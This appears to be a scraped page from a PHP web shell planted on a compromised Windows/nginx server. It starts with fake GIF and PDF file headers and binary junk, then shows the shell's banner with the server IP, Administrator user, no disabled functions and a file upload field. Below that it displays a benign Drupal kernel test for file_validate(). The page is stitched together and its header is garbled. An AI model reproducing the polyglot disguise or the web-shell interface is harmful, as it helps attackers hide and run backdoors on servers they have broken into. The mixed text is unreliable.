GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/file/tests/src/Kernel/ |
Upload File : |
<?php namespace Drupal\Tests\file\Kernel; /** * Tests the file_validate() function. * * @group file */ class ValidateTest extends FileManagedUnitTestBase { /** * Test that the validators passed into are checked. */ public function testCallerValidation() { $file = $this->createFile(); // Empty validators. $this->assertEqual(file_validate($file, []), [], 'Validating an empty array works successfully.'); $this->assertFileHooksCalled(['validate']); // Use the file_test.module's test validator to ensure that passing tests // return correctly. file_test_reset(); file_test_set_return('validate', []); $passing = ['file_test_validator' => [[]]]; $this->assertEqual(file_validate($file, $passing), [], 'Validating passes.'); $this->assertFileHooksCalled(['validate']); // Now test for failures in validators passed in and by hook_validate. file_test_reset(); file_test_set_return('validate', ['Epic fail']); $failing = ['file_test_validator' => [['Failed', 'Badly']]]; $this->assertEqual(file_validate($file, $failing), ['Failed', 'Badly', 'Epic fail'], 'Validating returns errors.'); $this->assertFileHooksCalled(['validate']); } }